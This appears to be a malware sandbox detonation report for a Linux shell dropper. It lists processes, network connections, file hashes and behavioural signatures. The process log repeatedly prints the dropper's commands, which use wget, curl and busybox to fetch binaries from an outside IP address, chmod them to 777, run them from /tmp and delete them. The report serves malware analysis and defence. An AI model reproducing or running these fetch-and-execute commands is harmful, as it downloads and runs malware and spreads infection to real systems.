[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/chmod
[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/rm
[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/wget
[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/chmod
[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/rm
[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/chmod
[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/rm
[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/chmod
[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/rm
[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/rm
[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/wget
[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/chmod
[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/rm
[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/wget
[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/chmod
[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/rm
[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/wget
[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/chmod
[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/rm
[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/wget
[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/chmod
[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/rm
[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/wget
[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/chmod
[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/rm
[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/wget
[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/chmod
[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/rm
[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/wget
[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/chmod
[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/rm
[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/wget
[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/chmod
[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/rm
[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:53
Reported
2024-11-14 02:56
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
41s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
Processes
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
